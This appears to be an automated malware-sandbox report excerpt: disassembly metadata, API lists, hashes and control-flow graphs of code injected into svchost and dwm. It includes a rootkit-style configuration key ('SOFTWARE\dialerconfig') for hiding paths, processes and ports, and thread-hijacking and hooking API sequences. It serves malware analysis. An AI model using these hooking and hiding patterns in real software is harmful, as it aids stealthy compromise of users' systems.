                                                • Instruction ID: cb79dc33559b0f95bb60b0cde89e84ae2df944f9770e57cdc4cb0b3c573a2f82
                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction Fuzzy Hash: AAF08938704BC097EE004B13B98813652B0B788FD0F0D8171DD9627B98DE6DC4418704
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction ID: f86b637eb32bfff765e459163f8dfbac5e671ae7377998e7d76cf580e9d6127c
                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction Fuzzy Hash: 2FF082797216449BEF444F60E8DC37527F0AB88B81F4E2019958B952E0CFB9C488CB11
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction ID: d348b5d625e54793deef9836e859e1b86d142179e8831b4bd13031e39927742b
                                                • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction Fuzzy Hash: 1102DD36119B808ADB60CB55F49436AB7E0F3C4794F654119EA8E57BA8DFBED444CB00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 2210144848-0
                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction ID: 120a50f670a50f483da2c0c9ebf76d6ea500c309c481725890b1ba8b0a7d5c24
                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction Fuzzy Hash: 6881CE3AA106508EFF509B6198C93BD26F1F784B88F4E6116EE8A777D1DBB68441C710
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction ID: d54defd45b00235f0a5b52e80c40345050d2ddf77d4baf772ee173c35ffecfc5
                                                • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction Fuzzy Hash: 9961DC3A519B40CAEB608B25E48832AB7E0F3C8754F655119EACD67BE4CBBED440CF44
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: 5b378ba5170c2f9b41d1dfd193bd082308d38a3428fc6ad1d2b509724cedbea8
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: 7611917EA59A000BFF981164E4DE37511E0AB66374F8F4634EAFE366D78BD68C424100
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2628133468.0000026E02790000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E02790000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e02790000_svchost.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: 306ed0f9a8ce923b34550b23e0447b8c7fbd5d4c3aa55d30c293b06b1607e809
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: 4B11913EA94A0049FE681965E5DE37911C06BD4374FCF4634BB7F26AD68ABA8C414114
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                • String ID:
                                                • API String ID: 1092925422-0
                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction ID: c5f637122e4ed7850266f55ef1623497a967814e6ec45223b2bb1c521939212d
                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction Fuzzy Hash: D8113C3A704B418BEF149B21F44866966F1F748B84F5A4069DE8917794EF7EC504CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2628133468.0000026E02790000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E02790000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e02790000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction ID: d08c8700d76a78cb0c850101bba095738e44c759dd3315024c9db82c63c9ae1f
                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction Fuzzy Hash: 9C51B13A7127108EEF14CF15E488B3933E5F342B98F5A8124DA1A6B7C9DBB6C941C706
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2628133468.0000026E02790000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E02790000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e02790000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction ID: 2e34a33e8b951dc0b157d7c85fd4c9d309e6cab236e5dbf5ad78db3a83483f47
                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction Fuzzy Hash: 0131D13A2017508EEF14DF11E8CC72937E9F341B98F1A8014AE4A677C5CBBAC944C706
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Free
                                                • String ID:
                                                • API String ID: 3168794593-0
                                                • Opcode ID: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
                                                • Instruction ID: c945b41d6b1a77b17dc736a4c4eb5d4615414c3e2fa7c32a8a5d32909ddcca4b
                                                • Opcode Fuzzy Hash: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
                                                • Instruction Fuzzy Hash: 8D115E39614F89DAEB549F66F88822A73B0F789B80F094069DB8A13795DF7AC051CB01
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction ID: 293d11b8bcc3bed5511c8e55199a8cc5950c380228a3a3dc7daa9be91f8680c6
                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction Fuzzy Hash: 4C71C47A2047814AEF689F3599C83FA67D0F745B84F6E402ADD4A77BCADEB6C5048700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction ID: 4730922445fba0afd729ff619876ef7e1fd9d4807e9105935bc2155c3d40dba4
                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction Fuzzy Hash: D151EC3A2047814AEE75AE3595DC37A66D1F785780F6E4129CD8A33FDACAB7C8018B50
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID: U
                                                • API String ID: 442123175-4171548499
                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction ID: 7eac34bbef102e6c47f8f5a6496b14d7b461bf55e7a23bd93312cc1a63268345
                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction Fuzzy Hash: F041D536714A808AEF209F25E4883AAB7F0F388794F4A4025EE8D97788DB7DC441CB40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Stringtry_get_function
                                                • String ID: LCMapStringEx
                                                • API String ID: 2588686239-3893581201
                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction ID: a24c0459c01ebddc388d5b2883160e35a780ad4efc37e4fcb2efb279007c2527
                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction Fuzzy Hash: 94111239608B808ADB60CB56F4842AAB7B5F7C9B90F584126EECD53B59DF79C450CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFileHeaderRaise
                                                • String ID: csm
                                                • API String ID: 2573137834-1018135373
                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction ID: 6e321ace0db8733173165fb413e00db85a1b1ce38e23647320c2183226c58682
                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction Fuzzy Hash: E7113D36204B8086EBA08B25F58426AB7E0F788B98F2D4225DF8D177A4DF7DC551CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                • String ID: InitializeCriticalSectionEx
                                                • API String ID: 539475747-3084827643
                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction ID: 19a40bc9aff518ddf8ae5680a2be623e4ca6d1fcb1b5fe591b215ebb3cb361f5
                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction Fuzzy Hash: 97F0E93931078087EF146B51F48867563B0A788BC0F5E4025AA8D23B94CFBAC494C700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Valuetry_get_function
                                                • String ID: FlsSetValue
                                                • API String ID: 738293619-3750699315
                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction ID: 0a61cd9ef17e401306ac681dcd5933b3761cfae0940fe3a9e9e710fff15b033f
                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction Fuzzy Hash: 64E09B7920064097FF145B65F8CC7B563B1BBC8780F5E4036D589263D5CEBAC855C700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2628133468.0000026E02790000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E02790000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e02790000_svchost.jbxd
                                                Similarity
                                                • API ID: try_get_function
                                                • String ID: November$October
                                                • API String ID: 2742660187-1636048786
                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction ID: 617fd73f1689e2853b7dcfcecc9b79dd44f18d34fdab6d51be7d8570230a9733
                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction Fuzzy Hash: 6FE0927A2046419AFF059B51F4D82F432E1DBC8750F5F5027AA19262D6CFBAC8868340
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID:
                                                • API String ID: 756756679-0
                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction ID: 84d304e92210c3a5516ea8afc0f90508175ca4ff531b927cfa7d01b56a93969e
                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction Fuzzy Hash: F521A936605F908AEF118F69E44826AF3E0FB84B94F5A4124DE8C97B55EFB9C542C700
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcess
                                                • String ID:
                                                • API String ID: 1617791916-0
                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction ID: 3578bc6c7432bad737c7c750152b3da7679d02cb8aa83872e3fa5392a8936c42
                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction Fuzzy Hash: 97E0EDB5611A01CBEB049F66D85836976F1FB88F52F4EC064C98907390DFBF8499CB51

                                                Execution Graph

                                                Execution Coverage:1.3%
                                                Dynamic/Decrypted Code Coverage:94.1%
                                                Signature Coverage:0%
                                                Total number of Nodes:102
                                                Total number of Limit Nodes:16
                                                execution_graph 21162 1c6cef13b99 21167 1c6cef13ae6 21162->21167 21163 1c6cef13b36 VirtualQuery 21166 1c6cef13b50 21163->21166 21163->21167 21164 1c6cef13b6a VirtualAlloc 21165 1c6cef13b9b GetLastError 21164->21165 21164->21166 21165->21167 21167->21163 21167->21164 21167->21166 21168 1c6cef11c28 21173 1c6cef11650 GetProcessHeap HeapAlloc 21168->21173 21170 1c6cef11c3e Sleep SleepEx 21171 1c6cef11c37 21170->21171 21171->21170 21172 1c6cef115c0 StrCmpIW StrCmpW 21171->21172 21172->21171 21217 1c6cef11274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 21173->21217 21175 1c6cef11678 21218 1c6cef11274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 21175->21218 21177 1c6cef11689 21219 1c6cef11274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 21177->21219 21179 1c6cef11692 21220 1c6cef11274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 21179->21220 21181 1c6cef1169b 21182 1c6cef116b6 RegOpenKeyExW 21181->21182 21183 1c6cef116e8 RegOpenKeyExW 21182->21183 21184 1c6cef118ce 21182->21184 21185 1c6cef11727 RegOpenKeyExW 21183->21185 21186 1c6cef11711 21183->21186 21184->21171 21188 1c6cef1174b 21185->21188 21189 1c6cef11762 RegOpenKeyExW 21185->21189 21228 1c6cef112c8 16 API calls 21186->21228 21221 1c6cef1104c RegQueryInfoKeyW 21188->21221 21192 1c6cef11786 21189->21192 21193 1c6cef1179d RegOpenKeyExW 21189->21193 21190 1c6cef1171d RegCloseKey 21190->21185 21229 1c6cef112c8 16 API calls 21192->21229 21196 1c6cef117d8 RegOpenKeyExW 21193->21196 21197 1c6cef117c1 21193->21197 21200 1c6cef117fc 21196->21200 21201 1c6cef11813 RegOpenKeyExW 21196->21201 21230 1c6cef112c8 16 API calls 21197->21230 21198 1c6cef11793 RegCloseKey 21198->21193 21231 1c6cef112c8 16 API calls 21200->21231 21203 1c6cef11837 21201->21203 21204 1c6cef1184e RegOpenKeyExW 21201->21204 21207 1c6cef1104c 6 API calls 21203->21207 21208 1c6cef11889 RegOpenKeyExW 21204->21208 21209 1c6cef11872 21204->21209 21205 1c6cef117ce RegCloseKey 21205->21196 21206 1c6cef11809 RegCloseKey 21206->21201 21210 1c6cef11844 RegCloseKey 21207->21210 21212 1c6cef118ad 21208->21212 21213 1c6cef118c4 RegCloseKey 21208->21213 21211 1c6cef1104c 6 API calls 21209->21211 21210->21204 21214 1c6cef1187f RegCloseKey 21211->21214 21215 1c6cef1104c 6 API calls 21212->21215 21213->21184 21214->21208 21216 1c6cef118ba RegCloseKey 21215->21216 21216->21213 21217->21175 21218->21177 21219->21179 21220->21181 21222 1c6cef110b9 21221->21222 21223 1c6cef111b5 RegCloseKey 21221->21223 21222->21223 21224 1c6cef110c7 RegEnumValueW 21222->21224 21223->21189 21226 1c6cef1111c 21224->21226 21225 1c6cef11149 GetProcessHeap HeapAlloc 21225->21226 21226->21223 21226->21224 21226->21225 21227 1c6cef1117f GetProcessHeap HeapFree 21226->21227 21227->21226 21228->21190 21229->21198 21230->21205 21231->21206 21232 1c6cef1562d 21234 1c6cef15634 21232->21234 21233 1c6cef1569b 21234->21233 21235 1c6cef15717 VirtualProtect 21234->21235 21236 1c6cef15743 GetLastError 21235->21236 21237 1c6cef15751 21235->21237 21236->21237 21238 1c6cef42908 21239 1c6cef42936 21238->21239 21240 1c6cef42994 VirtualAlloc 21239->21240 21241 1c6cef429b8 21239->21241 21240->21241 21242 1c6cef12a7c 21244 1c6cef12ac1 21242->21244 21243 1c6cef12b20 21244->21243 21246 1c6cef13930 21244->21246 21247 1c6cef1393d StrCmpNIW 21246->21247 21248 1c6cef13952 21246->21248 21247->21248 21248->21244 21249 1c6cef15dd0 21250 1c6cef15ddd 21249->21250 21251 1c6cef15de9 21250->21251 21257 1c6cef15efa 21250->21257 21252 1c6cef15e1e 21251->21252 21253 1c6cef15e6d 21251->21253 21254 1c6cef15e46 SetThreadContext 21252->21254 21254->21253 21255 1c6cef15fde 21258 1c6cef15ffe 21255->21258 21271 1c6cef144c0 VirtualFree 21255->21271 21256 1c6cef15f21 VirtualProtect FlushInstructionCache 21256->21257 21257->21255 21257->21256 21267 1c6cef14ed0 GetCurrentProcess 21258->21267 21260 1c6cef16003 21262 1c6cef16017 ResumeThread 21260->21262 21264 1c6cef16057 21260->21264 21263 1c6cef1604b 21262->21263 21263->21260 21272 1c6cef17a20 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 21264->21272 21266 1c6cef1609f 21268 1c6cef14eec 21267->21268 21269 1c6cef14f33 21268->21269 21270 1c6cef14f02 VirtualProtect FlushInstructionCache 21268->21270 21269->21260 21270->21268 21271->21258 21272->21266 21273 1c6ceee2908 21275 1c6ceee2936 21273->21275 21274 1c6ceee2aa7 21275->21274 21276 1c6ceee2994 VirtualAlloc 21275->21276 21276->21274 21277 1c6ceee29b8 21276->21277 21277->21274 21278 1c6ceee2a2b LoadLibraryA 21277->21278 21278->21277

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                • API String ID: 106492572-2879589442
                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction ID: 4b413b815da05522b192e873043b4a5273b652f8b123e7ffde26ea6227f556a1
                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction Fuzzy Hash: 787127B6751A9585FB10DFA6EC94AD923B4FBA8B8CF005111DEAD47B28DF38C544C308

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 51 1c6cef15c10-1c6cef15c37 52 1c6cef15c39-1c6cef15c48 51->52 53 1c6cef15c4b-1c6cef15c56 GetCurrentThreadId 51->53 52->53 54 1c6cef15c58-1c6cef15c5d 53->54 55 1c6cef15c62-1c6cef15c69 53->55 58 1c6cef1608f-1c6cef160a6 call 1c6cef17a20 54->58 56 1c6cef15c7b-1c6cef15c8f 55->56 57 1c6cef15c6b-1c6cef15c76 call 1c6cef15a40 55->57 60 1c6cef15c9e-1c6cef15ca4 56->60 57->58 63 1c6cef15caa-1c6cef15cb3 60->63 64 1c6cef15d75-1c6cef15d96 60->64 67 1c6cef15cfa-1c6cef15d6d call 1c6cef145f0 call 1c6cef14590 call 1c6cef14550 63->67 68 1c6cef15cb5-1c6cef15cf8 call 1c6cef186a0 63->68 69 1c6cef15d9c-1c6cef15dbc GetThreadContext 64->69 70 1c6cef15eff-1c6cef15f10 call 1c6cef1759f 64->70 80 1c6cef15d70 67->80 68->80 74 1c6cef15efa 69->74 75 1c6cef15dc2-1c6cef15de3 69->75 83 1c6cef15f15-1c6cef15f1b 70->83 74->70 75->74 84 1c6cef15de9-1c6cef15df2 75->84 80->60 86 1c6cef15fde-1c6cef15fee 83->86 87 1c6cef15f21-1c6cef15f78 VirtualProtect FlushInstructionCache 83->87 88 1c6cef15e72-1c6cef15e83 84->88 89 1c6cef15df4-1c6cef15e05 84->89 98 1c6cef15ffe-1c6cef1600a call 1c6cef14ed0 86->98 99 1c6cef15ff0-1c6cef15ff7 86->99 92 1c6cef15fa9-1c6cef15fd9 call 1c6cef1798c 87->92 93 1c6cef15f7a-1c6cef15f84 87->93 94 1c6cef15ef5 88->94 95 1c6cef15e85-1c6cef15ea3 88->95 96 1c6cef15e07-1c6cef15e1c 89->96 97 1c6cef15e6d 89->97 92->83 93->92 101 1c6cef15f86-1c6cef15fa1 call 1c6cef14470 93->101 95->94 103 1c6cef15ea5-1c6cef15eec call 1c6cef139e0 95->103 96->97 104 1c6cef15e1e-1c6cef15e68 call 1c6cef13a50 SetThreadContext 96->104 97->94 112 1c6cef1600f-1c6cef16015 98->112 99->98 105 1c6cef15ff9 call 1c6cef144c0 99->105 101->92 103->94 118 1c6cef15ef0 call 1c6cef175bd 103->118 104->97 105->98 116 1c6cef16057-1c6cef16075 112->116 117 1c6cef16017-1c6cef16055 ResumeThread call 1c6cef1798c 112->117 120 1c6cef16077-1c6cef16086 116->120 121 1c6cef16089 116->121 117->112 118->94 120->121 121->58
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: Thread$Current$Context
                                                • String ID:
                                                • API String ID: 1666949209-0
                                                • Opcode ID: 196898b9c00e9a2a94215751572aa4ea3ed8279feab0b04f45af8764fe45d318
                                                • Instruction ID: 390e2b3793c9e8820de7e6cb88742dab50249f28b9ce630da3974e5956a36fa5
                                                • Opcode Fuzzy Hash: 196898b9c00e9a2a94215751572aa4ea3ed8279feab0b04f45af8764fe45d318
                                                • Instruction Fuzzy Hash: E3D1BA76249B8882EB70DB5AE89479A77B0F3C8B84F101216EADD47BA5DF3DC541CB04

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 123 1c6cef151b0-1c6cef151dc 124 1c6cef151ed-1c6cef151f6 123->124 125 1c6cef151de-1c6cef151e6 123->125 126 1c6cef15207-1c6cef15210 124->126 127 1c6cef151f8-1c6cef15200 124->127 125->124 128 1c6cef15221-1c6cef1522a 126->128 129 1c6cef15212-1c6cef1521a 126->129 127->126 130 1c6cef15236-1c6cef15241 GetCurrentThreadId 128->130 131 1c6cef1522c-1c6cef15231 128->131 129->128 133 1c6cef1524d-1c6cef15254 130->133 134 1c6cef15243-1c6cef15248 130->134 132 1c6cef157b3-1c6cef157ba 131->132 135 1c6cef15256-1c6cef1525c 133->135 136 1c6cef15261-1c6cef1526a 133->136 134->132 135->132 137 1c6cef15276-1c6cef15282 136->137 138 1c6cef1526c-1c6cef15271 136->138 139 1c6cef152ae-1c6cef15305 call 1c6cef157c0 * 2 137->139 140 1c6cef15284-1c6cef152a9 137->140 138->132 145 1c6cef15307-1c6cef1530e 139->145 146 1c6cef1531a-1c6cef15323 139->146 140->132 149 1c6cef15316 145->149 150 1c6cef15310 145->150 147 1c6cef15335-1c6cef1533e 146->147 148 1c6cef15325-1c6cef15332 146->148 151 1c6cef15340-1c6cef15350 147->151 152 1c6cef15353-1c6cef15378 call 1c6cef17950 147->152 148->147 149->146 154 1c6cef15386-1c6cef1538a 149->154 153 1c6cef15390-1c6cef15396 150->153 151->152 163 1c6cef1540d-1c6cef15422 call 1c6cef13da0 152->163 164 1c6cef1537e 152->164 156 1c6cef15398-1c6cef153b4 call 1c6cef14470 153->156 157 1c6cef153c5-1c6cef153cb 153->157 154->153 156->157 168 1c6cef153b6-1c6cef153be 156->168 160 1c6cef153cd-1c6cef153ec call 1c6cef1798c 157->160 161 